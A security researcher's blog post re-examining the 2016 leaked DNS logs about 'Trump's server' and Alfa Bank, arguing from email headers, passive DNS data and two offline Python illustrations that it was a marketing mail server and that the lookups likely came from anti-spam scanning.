<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL0W2VE93J4gbVp6Hid5dbmyH-Pp5g9JUEjP2sK_Pv1KeWPj-yTG8CByb9Oi3YWMHUbSafgHYs6lyXX-u9cEHBvph9XtnrYk4HF0Y3gi3ZpH3hpSuguUtjJURwRfKjnff4NThPeZIPqJuQ/s1600/Moscow-acylic-canvas-m2017.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL0W2VE93J4gbVp6Hid5dbmyH-Pp5g9JUEjP2sK_Pv1KeWPj-yTG8CByb9Oi3YWMHUbSafgHYs6lyXX-u9cEHBvph9XtnrYk4HF0Y3gi3ZpH3hpSuguUtjJURwRfKjnff4NThPeZIPqJuQ/s320/Moscow-acylic-canvas-m2017.jpg" style="cursor: move;" title="Copyright Mila Parkour" width="320" /></a></div>
<div>
The news of Trump's server making interesting outbound connections caught the attention of many security researchers in October 2016, and many of us nerds spent at least some time checking IP addresses and domains and looking at the logs. </div>
<div>
<br /></div>
<div>
However, the logs that were kindly shared by <a href="http://ljean.com/NetworkData.php">Jean Camp</a> brought more questions than answers. For example, we see a bunch of DNS lookups for the A record of <i>MAIL1.TRUMP-EMAIL.COM</i>, but not much more that would support the claims of secret communications. A number of researchers looked at them and wrote detailed explanations of why this was just a marketing email server, unlikely to be used for clandestine communications, and why the correlation of the DNS log with political events seems very circumstantial. The fact that there was not enough information to reach a final conclusion allowed the story to simmer until it flared up again in March 2017, when Trump made allegations about wiretapping of Trump Tower. </div>
<div>
<br /></div>
<div>
The reason we are raising this story from the dead again is to provide additional evidence that "Trump's server" used to be a marketing email server. We also offer possible explanations for some of the events and question some premises and assumptions of the original disclosure. We may repeat many of the good points made by <a href="https://krypt3ia.wordpress.com/2016/11/01/shits-gone-plaid-gdd53-and-slate/">Krypt3ia</a> and <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMoe9RIrJTZ">Errata Security</a> in order to turn this collection of events into a more cohesive narrative.<br />
<b><br /></b>
<br />
<div class="" style="clear: both;">
<b>Disclaimer:</b> We analyzed the email messages, the leaked logs, and public DNS and IP information. We seek technical correctness and will welcome additional data. The conclusions made in this article were not driven by political opinions; we did not vote for Trump and do not have any interest in Alfa Bank. If you find technical or factual errors, please let us know in the comments or by <a href="https://www.blogger.com/profile/05026389826489033821">email</a>.</div>
<div class="separator" style="clear: both;">
<br /></div>
<span style="color: #f1c232;">Examples of emails sent from the server in 2011-2016</span></div>
<div>
The samples of email messages below show that the server was used for sending newsletter offers for at least 5 years and likely longer. We have a number of samples and mail logs of spam messages dated March 7, 2011 through February 29, 2016. Below are the email screenshots, a list of subjects along with a partial string from each header, and the full headers and screenshots of two messages.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglSc6GLQeWDJ5Oebei2XAE4YvjiGatVSg-qKi9YubWdgbOQyoA62UiFfXpfuNIV3N0eB0_W7Tm6YSGbQ1TDLqZjCyaOe8po0JYlgbD0uFmraYNd5slubeNJu79dimU9Yv6KaVtnf3NRwtv/s1600/screenshot-1749.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglSc6GLQeWDJ5Oebei2XAE4YvjiGatVSg-qKi9YubWdgbOQyoA62UiFfXpfuNIV3N0eB0_W7Tm6YSGbQ1TDLqZjCyaOe8po0JYlgbD0uFmraYNd5slubeNJu79dimU9Yv6KaVtnf3NRwtv/s1600/screenshot-1749.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Examples of marketing emails from March 7, 2011 to Feb. 29, 2016</td></tr>
</tbody></table>
</div>
<div>
<table border="1" style="background-color: white; border-spacing: 1px; box-sizing: border-box; color: #313131; font-family: verdana, geneva, tahoma, arial, helvetica, sans-serif; font-size: 14px;"><tbody style="box-sizing: border-box;">
<tr style="box-sizing: border-box;"><td style="box-sizing: border-box;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4CFwQSsDWlp5wWbNPIzmH3717gh1vly4bg5JHpsbJ978zFHxaTuC7Ir5EMsTWZFql1BkV_Fkqtt9l3RyQVBVFXRnwgCY2UWS6XQi-NDdiv8-uMr4rjR8JLHpCLNr4u2ybQWR3OxCd0R9P/s1600/screenshot-1757.png" imageanchor="1" style="clear: left; font-family: times; font-size: medium; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4CFwQSsDWlp5wWbNPIzmH3717gh1vly4bg5JHpsbJ978zFHxaTuC7Ir5EMsTWZFql1BkV_Fkqtt9l3RyQVBVFXRnwgCY2UWS6XQi-NDdiv8-uMr4rjR8JLHpCLNr4u2ybQWR3OxCd0R9P/s320/screenshot-1757.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: x-small;">Variety of emails received<br /> from <i style="font-size: 12.8px;">MAIL1.TRUMP-EMAIL.COM</i><span style="font-size: 12.8px;"> </span></span><br />
<span style="font-family: inherit; font-size: x-small;"><span style="font-size: 12.8px;">2011-2016</span></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
</td><td style="box-sizing: border-box;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibIAiVOVQeYHgARNLCUIAxtWLZxAczYSY2yRi3zS6F4zd_6Voqg06euuQlKAwQ5FBPmjJu7whEiiJvo3IkKDQYf4_GR-TWRJHeNfg9Q7idpX6172FOHhOpNhAcEcYgZsFIdTS2NDmnYV2X/s1600/mar2011email.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibIAiVOVQeYHgARNLCUIAxtWLZxAczYSY2yRi3zS6F4zd_6Voqg06euuQlKAwQ5FBPmjJu7whEiiJvo3IkKDQYf4_GR-TWRJHeNfg9Q7idpX6172FOHhOpNhAcEcYgZsFIdTS2NDmnYV2X/s320/mar2011email.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First message sample<br />
available date: Mar.7, 2011</td></tr>
</tbody></table>
<br /></td></tr>
<tr style="box-sizing: border-box;"><td style="box-sizing: border-box;"><div style="text-align: center;">
<span style="color: black; font-size: small;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p9ahYe_swUGPBouVCQoFTp8VvIAUpekRvf9LnTrZUCotv5ObiQiAV9n2TGujQx4csCHnvon1BLE_Q1_gznRojJKXH31FnsKiUoaCROPlmnXatQ6L37esbF_BWFdpCh8Sr_3wxuI45UWg/s1600/screenshot-1750.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5p9ahYe_swUGPBouVCQoFTp8VvIAUpekRvf9LnTrZUCotv5ObiQiAV9n2TGujQx4csCHnvon1BLE_Q1_gznRojJKXH31FnsKiUoaCROPlmnXatQ6L37esbF_BWFdpCh8Sr_3wxuI45UWg/s320/screenshot-1750.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Last message available dated:<br />
Feb. 29, 2016</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"></span></div>
<span style="color: black; font-size: small;">
</span></div>
</td><td style="box-sizing: border-box;"><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjcIG2uKnpFyKH3ESYRnyKy2TmTo64hrQBHXnxKn6PpyFoksqhwuuAIb7j119gPrlLP_To8LVCKv9IRmQjtEyVmPKEQ3iPqh9x2Xi8arZ15Y-uppjKgI6cqPOzo_xz6i8nzx5oHqMupI2r/s1600/header.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjcIG2uKnpFyKH3ESYRnyKy2TmTo64hrQBHXnxKn6PpyFoksqhwuuAIb7j119gPrlLP_To8LVCKv9IRmQjtEyVmPKEQ3iPqh9x2Xi8arZ15Y-uppjKgI6cqPOzo_xz6i8nzx5oHqMupI2r/s320/header.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Raw email header of last email<br />
avail. Feb. 29, 2016</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<h3 style="text-align: left;">
<br />Before we go into technical details, here is a list of points in Q&A form.</h3>
<div class="separator" style="clear: both;">
<span style="color: #f1c232;">Q: </span>Did Trump or his associates communicate with the Russian bank via his server?</div>
<div class="separator" style="clear: both;">
<b><span style="color: #f1c232;">A: </span></b>The "messages" in the logs are DNS queries sent from one DNS server (Alfa Bank's resolver) to another (Cendyn's authoritative server) asking for the IP address of mail1.trump-email.com. A name lookup is not a connection to the host; the leaked logs that contain these queries do not give enough data to substantiate such claims.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNZbNCdM3zeCB0pIkFYX8Y5AYOe_CHzGkishRW9XggzkNI5b0oRRi889wuPtkScNsxekGFcNtraJK7fPFO3wp7U2FJMiqPtGEuZpt1J_EZ4QwQue-lc8peiNd3cxRMTNUbtp64LwJ5wH4s/s1600/irce-2014-booth.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNZbNCdM3zeCB0pIkFYX8Y5AYOe_CHzGkishRW9XggzkNI5b0oRRi889wuPtkScNsxekGFcNtraJK7fPFO3wp7U2FJMiqPtGEuZpt1J_EZ4QwQue-lc8peiNd3cxRMTNUbtp64LwJ5wH4s/s200/irce-2014-booth.jpg" width="112" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Listrak Conf. Booth</td></tr>
</tbody></table>
<b><span style="color: #f1c232;">Q:</span></b><b><span style="color: #f1c232;"> </span></b>Does that prove [insert anything related to Trump's claims about wiretapping, Russian computer hacking, Russian ties, etc.]? <br />
<span style="color: #f1c232;"><span style="color: #f1c232;"><b>A: </b></span></span>Despite various wild theories, the events described in the original post and the logs have no relation to Trump's claims that his wires were <strike>crossed</strike> tapped. This post does not prove that he "has" or "has no" other connections to Russia, or anything about Russian hacking or other foreign entities. "The server" has never been the primary basis for the listed allegations.<br />
<span style="color: #f1c232;"><br /><span style="color: #f1c232;"><b>Q:</b></span></span><b><span style="color: #f1c232;"> </span></b>Could that server in Trump Tower possibly have been bugged by Obama or the British, or hacked by<br />
someone who wants to accuse the president of communicating with Russia?<br />
<span style="color: #f1c232;"><b>A:</b></span><b><span style="color: #f1c232;"> </span></b>"That server" is the same server we are talking about, and it is not in Trump Tower. The server mail1.trump-email.com (66.216.133.29) was located in the Lititz, PA datacenter of Listrak, a reputable digital marketing company contracted by Cendyn. The machine with the IP address 66.216.133.29 is still in that datacenter and will be recycled for other needs. MAIL1.TRUMP-EMAIL.COM now points to a GoDaddy domain parking IP address (no actual server), while TRUMP1.CONTACT-CLIENT.COM still points to 66.216.133.29.<br />
<span style="color: #f1c232;"><br /><span style="color: #f1c232;"><b>Q:</b></span></span><b><span style="color: #f1c232;"> </span></b>So, what happened then?<br />
<span style="color: #f1c232;"><b>A:</b></span><b><span style="color: #f1c232;"> </span></b><br />
<div class="" style="clear: both;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7hoeoJBX4hio19aDIm4-fHm9fK0zYTtdjPlaz_bkvltc95D1TSJwjflJt_bmypKBuJaVu3g1NuXJm3z-J7V_K4cMe_dv_HmmqdUTDsEe5DJ7MlhCM0EYyMH-2xpNj-ZEcTv7uIFQqIuJL/s1600/beforeMarch2016.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7hoeoJBX4hio19aDIm4-fHm9fK0zYTtdjPlaz_bkvltc95D1TSJwjflJt_bmypKBuJaVu3g1NuXJm3z-J7V_K4cMe_dv_HmmqdUTDsEe5DJ7MlhCM0EYyMH-2xpNj-ZEcTv7uIFQqIuJL/s320/beforeMarch2016.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Mail flow before March 2016</td></tr>
</tbody></table>
From at least 2011 to March 2016, Alfa Bank employees and many other recipients around the world received so-called marketing emails (aka spam) from the Trump Organization, sent from MAIL1.TRUMP-EMAIL.COM. The digital marketing companies Cendyn and Listrak, who provided the mailing services, used their own mail and DNS servers in Pennsylvania and Florida. Cendyn registered that domain for the Trump Organization, which already owns over 3500 domains (src. <a href="https://reversewhois.domaintools.com/?email=34f379a1752ba1ab647bb9d62de7c4f1">Domaintools</a>). None of the servers were ever physically in Trump Tower. <br />
<br />
In March 2016, the Trump Organization changed vendors and stopped using Cendyn's services. Since at least May 4, 2016 (the earliest date in the logs), at least some of the companies that we believe received Trump spam in the past continued to make DNS lookups for the IP address of MAIL1.TRUMP-EMAIL.COM. Alfa Bank and Spectrum Health made many more lookups than the others. The other IP addresses belong to a quarantine appliance run by the anti-spam cloud filtering provider <a href="https://www.mailcleaner.net/">MailCleaner</a>, the eCommerce Corporation mail service, an Australian company called Shiftcare (software for home care services), Hostedmail.com, and a DNS server for small business hosting.<br />
None of them directly connected to MAIL1.TRUMP-EMAIL.COM. In addition, <a href="https://twitter.com/russellbrandom/status/793289191555825664">many other companies</a> are believed to have been seen by various ISPs doing similar lookups.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwLJpBnQLT8sv04dqP8sfDmzmqNGvOdo1FUrkLuL9yPdrr922R-rpdBH85Er6oHaFP4spN4kWEvP9itoHq1XZSFttpZlgrW1dKH3a3xWF-FPc0VgkyA6rR81iVSl9jAtD6K9t9PWny1F54/s1600/screenshot-1795.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwLJpBnQLT8sv04dqP8sfDmzmqNGvOdo1FUrkLuL9yPdrr922R-rpdBH85Er6oHaFP4spN4kWEvP9itoHq1XZSFttpZlgrW1dKH3a3xWF-FPc0VgkyA6rR81iVSl9jAtD6K9t9PWny1F54/s320/screenshot-1795.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;">DNS Lookups as seen in the logs until September 23, 2016<br />
The circle "Logs that leaked" shows the conversation content<br />
in the logs. This does not imply that the logs were stolen from<br />
Cendyn's ns[1-3].cdcservices.com as this is not the only<br />
source where they could come from. <br />
<a href="https://twitter.com/mikedamm/status/793501947743436800">There are concerns about the source of the logs</a></td></tr>
</tbody></table>
The logs span the period from May 4, 2016 to Sept. 23, 2016 and contain DNS lookup requests made by Alfa Bank's DNS servers and the companies mentioned. Some IP addresses in the logs are not actual DNS servers but the gateway IP addresses of those networks, so the log alone does not show which internal system issued a query. <br />
<br />
Alfa Bank and the other companies made daily (1 to 70+ a day) DNS lookups asking for the IP address of MAIL1.TRUMP-EMAIL.COM, the host that sent those spam emails, as seen in the email headers below.<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo}
</style>
<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Received: from <b>mail1.trump-email.com</b> ([66.216.133.29])</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> by <redacted> with ESMTP; 14 Jun 2013 11:19:11 -0400</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject:Content-Type:Content-Transfer-Encoding:Message-ID; i=trumphotels@contact-client.com;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Received: by <b>mail1.trump-email.com</b> id hncq6u17vn06 for <redacted@redacted.com>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <839CBA2F17SGIAGALHHU5NQ418SP0I4GT7UPH1TKPRC0H2NP5PDVI2JEG27M8MJ@b.contact-client.com>)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">List-Unsubscribe: <mailto:IM2GHO7PREI9U5V5SNNF83BLRHTO1UL966FONR690AG1N73O80JKU740V7EQIQ4G@<b>b.contact-client.com</b>></span></blockquote>
<br />
DNS lookups for the domains and IP addresses found inside messages that are not incoming but were delivered long ago may be caused by any of the following:<br />
<ul style="text-align: left;">
<li>misconfigurations or glitches in email and mail filtering services;</li>
<li>security appliances performing automated or search-triggered lookups (for example, checking names and addresses against DNS blacklists);</li>
<li>anti-spam rescans of the mailbox store;</li>
<li>endpoint-level anti-spam products.</li>
</ul>
Anti-spam systems are known to resolve every IP address and DNS name in a message's headers and to fetch the links the message contains. Following a List-Unsubscribe link this way can trigger an unintended unsubscribe, which is why IETF <a href="https://tools.ietf.org/html/rfc8058">RFC 8058, "Signaling One-Click Functionality for List Email Headers"</a>, released in January 2017, specifies how bulk senders and mail clients should signal one-click unsubscribe so that automated link scanning by anti-spam systems does not unsubscribe recipients.<br />
<br />
The exact reason for the lookups can only be guessed, since only the companies themselves would be able to tell which of their systems caused them, assuming enough internal logs were saved to correlate. The reason could differ from company to company: some of them made lookups for LINKS.TRUMP-EMAIL.COM, as all URLs in the emails used that subdomain. You can see examples of those links in the header screenshots above and in these <a href="https://twitter.com/search?f=tweets&q=links.trump-email.com&src=typd">Tweetbot posts</a>.<br />
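<div class="separator" style="clear: both;">
To make the above concrete, here is an added example (not code from the original post or from any mail vendor) that lists the query names a content scanner would have to resolve when it re-scans an already delivered message: the Received hops, the peer IP (for PTR and DNS blacklist checks), the DKIM selector key, the address domains in List-Unsubscribe and the envelope, and the hosts of the links in the body. The message is constructed from the header fragment quoted above; mx.example.net, user@example.net, the TOKEN strings, the body URL and the dnsbl.example zone are placeholders. Run against this sample, it shows the MAIL1 and LINKS names discussed here being looked up without any connection being made to them.</div>

```python
"""Which DNS lookups does a mail-security product generate when it re-scans a
message that was delivered long ago?  Added example for this post, not code
from the original analysis or from any vendor.  Everything runs offline."""
import email
import ipaddress
import re
from email import policy

# Constructed sample message.  Placeholders: mx.example.net, user@example.net,
# the TOKEN strings, the body URL.  The sending host, its address and the DKIM
# d=/s= tags follow the header fragment quoted in the post.
SAMPLE_MESSAGE = b"""\
Received: from mail1.trump-email.com ([66.216.133.29])
 by mx.example.net with ESMTP; 14 Jun 2013 11:19:11 -0400
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;
 h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject; i=trumphotels@contact-client.com;
Received: by mail1.trump-email.com id hncq6u17vn06 for <user@example.net>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <TOKEN@b.contact-client.com>)
List-Unsubscribe: <mailto:TOKEN@b.contact-client.com>
From: Trump Hotels <trumphotels@contact-client.com>
To: user@example.net
Date: Fri, 14 Jun 2013 11:19:10 -0400
Subject: Summer offer
Content-Type: text/plain; charset=us-ascii

Book now: http://links.trump-email.com/ls/click?upn=TOKEN
"""

HOP_RE = re.compile(r"\b(from|by)\s+([a-z0-9][a-z0-9.-]*)", re.I)
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
ADDR_RE = re.compile(r"[\w.+-]+@((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def dnsbl_qname(ip: str, zone: str) -> str:
    """Query name a DNS blacklist check builds: reversed octets under the zone."""
    return ".".join(reversed(ip.split("."))) + "." + zone


def lookups_for_message(raw: bytes, dnsbl_zone: str = "dnsbl.example") -> dict:
    """Map every query name a content scanner would resolve to the reasons why."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    wanted: dict = {}

    def add(qname: str, reason: str) -> None:
        wanted.setdefault(qname.lower().rstrip("."), set()).add(reason)

    for name, value in msg.items():
        value = " ".join(str(value).split())  # unfold continuation lines
        if name.lower() == "received":
            # HELO/host names of each hop and the IP literal of the peer
            for hop, host in HOP_RE.findall(value):
                add(host, f"Received {hop.lower()}")
            for ip in IPV4_RE.findall(value):
                add(ipaddress.ip_address(ip).reverse_pointer, "PTR check")
                add(dnsbl_qname(ip, dnsbl_zone), "DNSBL check")
        elif name.lower() == "dkim-signature":
            # Re-verifying the signature fetches the selector's public key
            tags = dict(t.strip().split("=", 1) for t in value.split(";") if "=" in t)
            if "d" in tags and "s" in tags:
                add(f"{tags['s']}._domainkey.{tags['d']}", "DKIM key fetch (TXT)")
        for domain in ADDR_RE.findall(value):
            add(domain, f"address domain in {name}")

    # Link scanners and URI blacklists resolve the hosts of every URL in the body
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    for host in URL_RE.findall(text):
        add(host, "URL in body (link scan / URIBL check)")
    return wanted


if __name__ == "__main__":
    for qname, reasons in sorted(lookups_for_message(SAMPLE_MESSAGE).items()):
        print(f"{qname:45} {', '.join(sorted(reasons))}")
```

<div class="separator" style="clear: both;">
The same walk over a mailbox store, repeated by a rescan or a search-triggered scan, produces A-record queries for names that came from mail delivered years earlier, which is the kind of traffic the logs show.</div>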
<br />
On September 21, Alfa Bank was reached for comment about the logs, which caused the number and variety of lookups to skyrocket as their security team started its investigation.<br />
<div class="" style="clear: both;">
The author of the original disclosure states that the lookup errors started on September 22, 2016 because Cendyn removed the DNS zone for mail1.trump-email.com from ns1 and ns3.cdcservices.com. These were two Cendyn DNS servers in Ft. Lauderdale, FL; the remaining one, ns2.cdcservices.com, is located in Boca Raton, FL. Considering that Trump had not been their client since March 2016, the hasty and belated removal was either a coincidence or a reaction to being notified and realizing that the zone, or the domain, should have been removed long ago.</div>
<div class="" style="clear: both;">
Passive DNS logs show only when a subdomain was first seen, not when it was created or assigned. The fact that TRUMP1.CONTACT-CLIENT.COM showed up in the passive DNS logs on Sept. 30 could be attributed to testing whether the server is reachable using the new (or existing) freebie domain (Cendyn creates one for each customer), especially if they indeed still used it for the CRM software that "CenDyn provides to the Trump Organization". </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
On September 27, Alfa Bank made a DNS request for the new TRUMP1.CONTACT-CLIENT.COM. Considering that at that time the bank's computer security department was investigating the claims, this is not surprising: the lookup was likely prompted by the various queries its IT department was running. For example, you can see the sudden appearance of queries for <span style="white-space: pre-wrap;">MAIL.TRUMP-EMAIL.COM (mail without the 1) from Alfa Bank's </span><span style="white-space: pre-wrap;">217.12.96.15 on September 22, which can be attributed to the investigation too.</span></div>
<div class="separator" style="clear: both;">
<span style="white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #f1c232;">Q: </span>Did you see <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank's statement </a>of March 17, 2017 that they were hacked, and that those connections to Trump's server were therefore made by hackers to look like Alfa Bank did it? (src. <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circa</a>)</div>
<div class="separator" style="clear: both;">
<b><span style="color: #f1c232;">A: </span></b>It is possible to send a lot of DNS traffic or other requests and perform an attack (DDoS or other) without actually "hacking" the victim. They were not "hacked" in this particular case, in the sense of someone infiltrating their network, nor do they say that. Alfa Bank received a lot of DNS queries, and DNS replies to requests spoofed with Alfa Bank's source address, after the news came out. We are sure that many of those requests are the result of various researchers trying things. 1340 DNS queries is not a large number. And no, we didn't do it. </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
While it is possible to spoof DNS requests and make them look like they came from Alfa Bank, it is not a convincing theory for events before September 23, 2016. From the logs provided, there were 7 other companies seen over the course of 4.5 months doing the same type of lookups.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
We think the DNS spoofing attacks that happened in 2017, as reported by Alfa Bank, were spurred by all the news about the mysterious DNS communications channel supposedly used by Trump and the Russians. Many researchers and hackers would try all kinds of queries to elicit server responses, and some possibly tried to make it look like the 'secret' communications continue. The evidence of those research efforts can be seen in the <a href="https://www.farsightsecurity.com/">Farsight pDNS</a> search for TRUMP-EMAIL.COM, where some recent entries include 'new' subdomains like the one below. The cause is that TRUMP-EMAIL.COM uses a wildcard DNS record, so queries for arbitrary subdomains resolve successfully and show up in the database (if seen by any pDNS sensor); a pDNS entry for such a name proves only that someone queried it, not that anyone created it.</div>
<br />
<table cellspacing="5" class="result" style="background-color: white; border-color: rgb(0, 136, 204); border-radius: 4px; border-style: solid; border-width: 2px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin: 1em 2.5em; padding-left: 1em; padding-right: 1em;"><tbody>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><span style="color: #20124d;">thej35t3rpwns.trump-email.com.</span></tt></td><td><tt><span style="color: #20124d;">A</span></tt></td><td><tt><span style="color: #20124d;">184.168.221.46</span></tt></td></tr>
</tbody></table>
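<div class="separator" style="clear: both;">
The wildcard behaviour is easy to misread in pDNS data, so here is an added example (not code from the original post) that implements the RFC 4592 wildcard matching rule over a small in-memory zone. The zone is constructed: the parking address is the one in the pDNS row above and the mail1 address is the one in the quoted headers, but the zone layout itself is an assumption. It shows that any label, or several labels, under the zone apex resolves to the wildcard, while a name below an explicitly defined owner such as mail1 does not, and it separates synthesized answers from configured ones.</div>

```python
"""Why a made-up label under a wildcard zone resolves and then appears in
passive DNS: the RFC 4592 wildcard matching rule over an in-memory zone.
Added example for this post, not code from the original analysis."""

# Constructed zone (fully qualified owner names with a trailing dot).  The
# addresses are taken from the post; the layout is an assumption.
ZONE = {
    "trump-email.com.":       {"A": ["184.168.221.46"]},
    "*.trump-email.com.":     {"A": ["184.168.221.46"]},  # the wildcard
    "mail1.trump-email.com.": {"A": ["66.216.133.29"]},   # an explicit owner
}


def _fqdn(name: str) -> str:
    name = name.lower()
    return name if name.endswith(".") else name + "."


def _existing_nodes(zone: dict) -> set:
    """Every owner name plus all of its ancestors (empty non-terminals exist too)."""
    nodes = set()
    for owner in zone:
        labels = owner.split(".")
        for i in range(len(labels)):
            nodes.add(".".join(labels[i:]))
    return nodes


def lookup(zone: dict, qname: str, rtype: str = "A"):
    """Return (rcode, rdata, synthesized) following RFC 4592 section 3.3.

    An exact match wins and never involves the wildcard.  Otherwise the
    closest existing ancestor (the "closest encloser") is found, and only a
    wildcard directly below it may synthesize an answer; if there is none,
    the name does not exist.
    """
    qname = _fqdn(qname)
    if qname in zone:
        return ("NOERROR", zone[qname].get(rtype, []), False)
    nodes = _existing_nodes(zone)
    labels = qname.split(".")
    for i in range(1, len(labels)):
        ancestor = ".".join(labels[i:])
        if ancestor in nodes:
            wildcard = "*." + ancestor
            if wildcard in zone:
                return ("NOERROR", zone[wildcard].get(rtype, []), True)
            return ("NXDOMAIN", [], False)  # encloser exists, no wildcard there
    return ("NXDOMAIN", [], False)


def is_wildcard_synthesized(zone: dict, qname: str) -> bool:
    """True when a name resolves only because of a wildcard: a pDNS row for it
    proves that a client queried the name, not that the owner configured it."""
    return lookup(zone, qname)[2]


if __name__ == "__main__":
    for q in ("thej35t3rpwns.trump-email.com", "mail1.trump-email.com",
              "foo.mail1.trump-email.com", "a.b.trump-email.com"):
        print(q, lookup(ZONE, q), "synthesized" if is_wildcard_synthesized(ZONE, q) else "")
```

<div class="separator" style="clear: both;">
An analyst does not have the zone file, of course; the practical check is to resolve a random label under the domain, and if it answers, to treat every unfamiliar subdomain in the pDNS results as something a client queried rather than something the owner configured.</div>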
<div class="separator" style="clear: both;">
